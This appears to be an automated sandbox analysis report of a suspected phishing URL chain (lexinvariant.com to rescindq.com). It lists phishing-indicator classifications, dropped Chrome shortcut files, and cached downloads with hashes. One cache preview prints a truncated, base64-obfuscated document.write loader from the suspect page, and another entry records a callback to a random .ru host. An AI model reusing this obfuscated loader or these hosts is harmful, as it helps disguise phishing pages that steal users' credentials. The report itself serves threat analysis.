URL: https://lexinvariant.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://lexinvariant.com
URL: https://85.rescindq.com/wqtyZAFZzF3hXgsogboKg/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To confirm your humanity, finish the task below.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://85.rescindq.com/wqtyZAFZzF3hXgsogboKg/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To confirm your humanity, finish the task below.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://85.rescindq.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": true, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://85.rescindq.com
URL: https://85.rescindq.com/wqtyZAFZzF3hXgsogboKg/ Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://85.rescindq.com/wqtyZAFZzF3hXgsogboKg/ Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Your current User-Agent string appears to be from an automated process, if this is incorrect, please click this link:", "prominent_button_name": "United States English Microsoft Homepage", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false }

URL: https://www.microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://www.microsoft.com
URL: https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://microsoft.com

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 13:04:42 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9859801676818596
Encrypted:	false
SSDEEP:
MD5:	750127F7FC1CE83731387DD83CE6E4C0
SHA1:	78A8964D01CD72B74230676F5D6FE43296FAA52A
SHA-256:	20F80E1A96BB182F5C3F767263060F2424DABF6E07A544C221550A6222F44F62
SHA-512:	28EF56F9A0D1C68F6F6E45316E8718A33EA694EEBBC7F12C3FD082D299A0F58116F6A37911B4C49F54D4F8DC181E0D2E7DD4AA0914E642B74B05820A3A5BC1A7
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......%U;......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY.p....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.p...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY.p...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 13:04:42 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.003445429507691
Encrypted:	false
SSDEEP:
MD5:	17741BA4A933E8DCEA550B3CE3E0D0B8
SHA1:	5FDD1AC85EAC44BB2A8E4A93326B98611BB01A86
SHA-256:	A7667E8890F5C3FB6E1AE763DBAD8D9439F978C97B32278F215AB384B50E6994
SHA-512:	E5E794CB4E8AB23047A2E8CEC4B2E1506DCA1382423949151641F6AC9D88F990F36E235013AFF7994A6E9C7BD20D1B925F8F10DEDEEB8EF2321CAC5E1FB05EAB
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......%U;......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY.p....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.p...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY.p...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.0135567457856265
Encrypted:	false
SSDEEP:
MD5:	9B3ACC34C8F81A7951EF1FE8BED9A6A6
SHA1:	067F51B61E016231E229AA05061EB0DB3EA7CD4A
SHA-256:	1B9683B0B34CDAB9B4F56792BAF802ED4802E52A5F523A2DACAA29ADE16CFC8B
SHA-512:	D06E5E0D091BF345E68DCD93ACFFBE8DBE16EFF007A23685EA39E05D2BF0FB2002B346A691F9F0E7C988A636F1835B689F5901B8352A35619DA5818A98ED2682
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY.p....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.p...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 13:04:42 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	4.001252182078558
Encrypted:	false
SSDEEP:
MD5:	93592163CC7888185ABFE8AED5838AD4
SHA1:	836151F3416B99C53876A537B0E560B168A063D6
SHA-256:	B6B8139EB33748B00D77A7639547DE7D6A45B9357F1944A7056A15E7377EE58D
SHA-512:	0533038977006BB271077625A92013455B808E7B346452FC4AAEE9581111EC68889CA53C0007A6A95AAF85E6E9E5758A03A9E408F6C47F0332494929B6CA094B
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......%U;......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY.p....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.p...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY.p...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 13:04:42 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9902407554012043
Encrypted:	false
SSDEEP:
MD5:	E047FD37750581CA9BB69CD5B360CEB0
SHA1:	525ADD344859966957105BCE5B67D4AC01EA6B7A
SHA-256:	960032C994815BA11578E092FA1B3D180A484ADBC33F09165762FA963761694E
SHA-512:	780DCF16DD7D4638E7AF82FF312E2FE8AD4279E15DE1169C9B7DF80F9F6BA313F8098D8FCD6B661FF47A175EE7A8FAB444D4DA6E5B79B42A822C917991FF19AB
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......%U;......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY.p....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.p...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY.p...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 13:04:42 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.998694519855546
Encrypted:	false
SSDEEP:
MD5:	8A576DE7E6FCE6148AE77ABB56005C9D
SHA1:	67A935EB47277247188DFEFBD607A63BA0A8C83C
SHA-256:	EA0730030C595C698BBB6B57ED00AE957BE99C5DCB36070AA256F8A4C52FD3DD
SHA-512:	F86E12B62C1483A1102D9931E46FD3D526B9E621D8342B6D371E5C4FCF66768EEC897D17CCC3AE8DFB45592085ACA4685880A43EC6E285BF705B11874BEB99D9
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....cp.%U;......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY.p....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.p...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY.p...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (14105), with CRLF line terminators
Category:	downloaded
Size (bytes):	33187
Entropy (8bit):	5.870759953744701
Encrypted:	false
SSDEEP:
MD5:	564D7E305EFFF7DAD0BB6D521219CF3B
SHA1:	B64CBEA8AD3D62E95A359561871245B285972D6D
SHA-256:	D829A0C887AD0B46489EEF6F84AC79A5B21A5649813409FD9DE01AFAAB303590
SHA-512:	A93BFD099D5F19253E05047C66D5AA03490F025CBF0BBD91D1B7052752D269C9044FFC33DE4B2F9F55A90C360F3429CF064A82242B24759A538C7ACC9F92757C
Malicious:	false
Reputation:	unknown
URL:	https://85.rescindq.com/wqtyZAFZzF3hXgsogboKg/
Preview:	The successful warrior is the average man, with laser-like focus. -->.. Don't be distracted by criticism. Remember, the only taste of success some people get is to take a bite out of you. -->..<script>....if(atob("aHR0cHM6Ly9SaWwucmVzY2luZHEuY29tL3dxdHlaQUZaekYzaFhnc29nYm9LZy8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZX

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	downloaded
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
URL:	https://mslawasq1fdbt4smgovect8av3dfpya4jiqeyxwzdxoaokfqfbwqz289.wceescty.ru/630765525396785175184515kYcquFYETwPSWRJNLTFBUMLVYSNIBOPILWEAXGAUUXCLYW
Preview:	1

Chrome Cache Entry: 105

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (13643)
Category:	downloaded
Size (bytes):	136701
Entropy (8bit):	5.511398316826998
Encrypted:	false
SSDEEP:
MD5:	893A0EF7D5FB8BEFF60859BB45D392A7
SHA1:	727FD7C9CB0D0793155AE798A7B4B52A01E4128F
SHA-256:	EC7785E15D58D2002511FD28C21AB8767C43F4F56A8142D5C738ADE18D5D3FA3
SHA-512:	226F6CBB76679E823CFB4DB3DE579A2115B89C512EAF1B1786FB387C03DC6B29D591C095C117AB66B02E805C9A8B1B5317A055196200D78F3B211599C766897C
Malicious:	false
Reputation:	unknown
URL:	https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/6028b39045f5c171d373.css
Preview:	.rdtDR{position:relative;z-index:3;width:100%}.EiaDC{z-index:4}.eP8Dq{display:flex;flex-direction:column}...hcw3J{color:#323335}.hcw3J a:hover{color:#535353}.KNvh9{color:#fff}.KNvh9 a:hover{color:#dcdcdc}..sTtmz{word-wrap:break-word;word-break:break-word;overflow-wrap:break-word;box-sizing:border-box;width:100%;padding:20px 0}.sTtmz.FG8T_{padding:5px}.sTtmz a,.sTtmz a:hover{color:inherit}.sTtmz ol,.sTtmz ul{margin:0 0 0 30px;padding:0}.jkRjK h1,.jkRjK h2,.jkRjK h3,.jkRjK h4,.jkRjK h5,.jkRjK h6,.jkRjK li,.jkRjK p{display:inline;margin-right:4px;font-weight:400;font-size:18px}..YH0K9{position:relative;width:100%;padding:0;line-height:0}.YH0K9.gBwSj{background:#181818}.YH0K9.gBwSj.S5qxR{background:none}.YH0K9.BuD0P{background:#f2f2f2}.YH0K9.aPnO4{background:#fff}.YH0K9.mLGql{margin:auto}.YH0K9.bDzAf,.YH0K9.zDzDH{flex-grow:1}.YH0K9 iframe{width:100%;height:500px;border:0}.YH0K9 iframe.sK02L{height:232px}.YH0K9 iframe.GZWz7{height:450px}.YH0K9 iframe.U5VF7{height:175px}.gszAl{position:relat

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	3892
Entropy (8bit):	7.943432521586061
Encrypted:	false
SSDEEP:
MD5:	B7550CF1C3FFBB74E3A59E55C1D42C4B
SHA1:	97ADFC45276A3153FECC3F116E50A2F1980CBF2C
SHA-256:	672883FAAB6CB31BB7C53B0E45F897FB96363640F3CAD2352AB25B589EDE079C
SHA-512:	33E56672F473855158D16EAAA933D50140812A9F5983DFFA46B9AB2E48949EBB05C9787D8DDED007AA5DF48E50CE13FF5C26C6CD275E1001492AA5D5C6B95925
Malicious:	false
Reputation:	unknown
URL:	"https://jimdo-storage.freetls.fastly.net/image/490132191/aaa87048-a581-40e7-8466-f42e5aedbd3f.png?quality=80,90&auto=webp&disable=upscale&width=160&height=85"
Preview:	RIFF,...WEBPVP8L .../....5...m.&.Y.c......'.....P..7Yc..)9...t#.P$9.`>............x..C.h..L..[..5w.;.-.C..$!O...i.=b\Wa.eS.....p... ..D..w.."L.7.yJ..S.r$.v....{.hD.g<z..j..^.P.]].... I.i.......5:w.k.................@J..9)...6.d...{....h....%s.q...[.CD.7:...8e.x."$..........J......XW.X~f....:...$..5...m.m.o.m.m.\|...3..IR$U./3.L..x..Y....:.....1.......-twwwwwwwwwwww.s.M..}......Su..!..01.K...G..."w6.......N.........e..!.:H.+..qw.Y.,....g.hR,u.I...>......j@D.o..m.s...zI.....U..g"..u......2.n...,..u..V...r......\?.......~...i.......,..aFza...%Y.BS7$u...%.......M..\.C.....G9...4l>...F...n. R...BLW.Gn.F.ba..Y.+.\..4.B../.x.....H.....sA8e...+2..%l...U..A.{..9p.8.T..nx.....!.S^(.0z...R..N....B.9.i.z.v.#.TFI....)..O..$d.#3.M.R7.D..Kg....i.\,Y.e.....Di}.2.\....+.~i.L.V.....t..}#e.._.......j<..<..*0).....VJ...@D$.k...\|;... ")..{..d.g......r.I.V."!^J.x....&.>.#)e+<......\u.R....3.."tN6.....\N.Z...j.3.#3."GeXV%F..-...7.h..I`....1.Y^.9;3.!.q.-...

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 8000, version 1.0
Category:	downloaded
Size (bytes):	8000
Entropy (8bit):	7.97130996744173
Encrypted:	false
SSDEEP:
MD5:	72993DDDF88A63E8F226656F7DE88E57
SHA1:	179F97EC0275F09603A8DB94D4380EB584D81CD5
SHA-256:	F4E80D9DFD374D02989B87A27B5ED4CB78FBB177C27F1478E9A8B0AFB7513149
SHA-512:	7C20165F9D22A86341E841FD58526209017DCDE2AFE2D0D2A89FE853D95DC69F658D25CF798C71F452DAB09843FC808C1AE87A60B1284134163ABF5A1D93E50A
Malicious:	false
Reputation:	unknown
URL:	https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2
Preview:	wOF2.......@......?@.................................`..T..t...6..6.$..h. ..T.....1E.r.8...KD......2.>L.......0..c.h...y_)s...N..(._C,/.v...7B...Z..gT@....u*.\t.9....{.&.;<...j.2.H-...A.S......E..)..f.Y8vuw^.^_.n{.Z..U.h..Kcm.........E..........'.J.-.-.......=.."...E...../R.8P....>?.]...R..Ag:.Pt..j..s..pG. .!f?.Q.T.".O.....D.r......3>gJN!V.\.!....+.......X.B.v....c9.&iW-[.,.. ...Q.k%I.s.%...d...8q..._~.C.n".v0..6B.eT..?..7.....l....3..7...M...5......k......^.....F.v~\|.....3N=.....[.!......}....F(...fA..c)0X$,FYL..=).(h<4...M5..<3.c....K/.{.p....3+'W...Z.[..;.w.....X....nx..v.(c;._.W......\|.b.....{...9..A6...V\|.N...Z?+\|H/.#.W%.._.8,...>._..w...RP..-.?.k7X..".._S.3,J.........&.8Gs.?yH.Yx......I_....._o.0K......(e.Q.W....=...J.7.\k.n.pd.....s..%...sD......_..&-...(.7..6.U..&<~8...9......uV..\|h.#m\.d./!....s.......b.j. ."...wX...B.`..Bj=......VnM....p..k.%..U.F..-VN).Y........_..W.p...B..\|.j..f..7....).~....n......c.3....t.......s..>...

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8133), with no line terminators
Category:	dropped
Size (bytes):	8133
Entropy (8bit):	5.755127143880125
Encrypted:	false
SSDEEP:
MD5:	004B530FB7FC572584493537C20F42F5
SHA1:	483ADE2AAF301A507A2A3BDE8D677D3ADA2EBECE
SHA-256:	61FDE0E44550C5842FB158026DC88BDF56B9BC4925B710A1A1B5DDFC91A08C82
SHA-512:	187A5D64B87D0B89605ACD67BCD4ED3DD064ED57347BEB1C2521A233379FB16E8360E67A7367795031C55CF2259F564BE259D52794F8A57EC0365BA2A1402852
Malicious:	false
Reputation:	unknown
Preview:	window._cf_chl_opt={cFPWv:'b'};~function(V,h,i,n,o,s,z,A){V=b,function(c,d,U,e,f){for(U=b,e=c();!![];)try{if(f=parseInt(U(258))/1(parseInt(U(218))/2)+-parseInt(U(256))/3(-parseInt(U(277))/4)+parseInt(U(266))/5(parseInt(U(217))/6)+parseInt(U(252))/7(-parseInt(U(225))/8)+-parseInt(U(188))/9+parseInt(U(241))/10+parseInt(U(191))/11*(-parseInt(U(183))/12),d===f)break;else e.push(e.shift())}catch(D){e.push(e.shift())}}(a,854988),h=this\|\|self,i=h[V(270)],n=function(a0,d,e,f){return a0=V,d=String[a0(209)],e={'h':function(D){return null==D?'':e.g(D,6,function(E,a1){return a1=b,a1(246)[a1(182)](E)})},'g':function(D,E,F,a2,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(a2=a0,D==null)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[a2(202)];Q+=1)if(R=D[a2(182)](Q),Object[a2(255)][a2(196)][a2(245)](H,R)\|\|(H[R]=L++,I[R]=!0),S=J+R,Object[a2(255)][a2(196)][a2(245)](H,S))J=S;else{if(Object[a2(255)][a2(196)][a2(245)](I,J)){if(256>J[a2(239)](0)){for(G=0;G<M;O<<=1,E-1==P?(P=0,N[a2(242)](F(O)),O=0):P++,G+

Chrome Cache Entry: 110

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	549
Entropy (8bit):	6.943052302431237
Encrypted:	false
SSDEEP:
MD5:	FD400ADA20E53B4BB4EFBBEB0C0E16FD
SHA1:	16C4AEFE874E9B5952A1E72528E1011BD38D8772
SHA-256:	E29475FE49A5A23D5ECA32E07367AA425D4A1F32D75DFE7E6D8D0398C35802CE
SHA-512:	3B144B04507C840A7A0A350480B4846D4A37B98551DA2B993879FE5995A48FCAAB0C3967ACDE6B57C6FEB3FB43E3F28B5CBFB7D69B9E8FDBF573EFD577626967
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....D.......sRGB.........PLTE...........'..1..4...........&........H..H..7.......!K!#M.......5.....J..D&(Q56].....;.......8..;...........WXw68^[\{...st...G........@\^\|...OPqtu.......gh.JKm......ACf..2..9UVv...........OQr..8.x.....:tRNS..Y...Y....Y..............................................7......IDAT8..W..0..O.I.`..{...?e..D`.O......0,.D.D..I$&......T.@..A..:.1@.._<A.t6....A.vN...@&K..'.....@....+.Vk.W.lZoP.l1.F.......C...xb.....\|.D.....o....n...G.......f.....K.}hqB.............{.!zf1;.....IEND.B`.

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
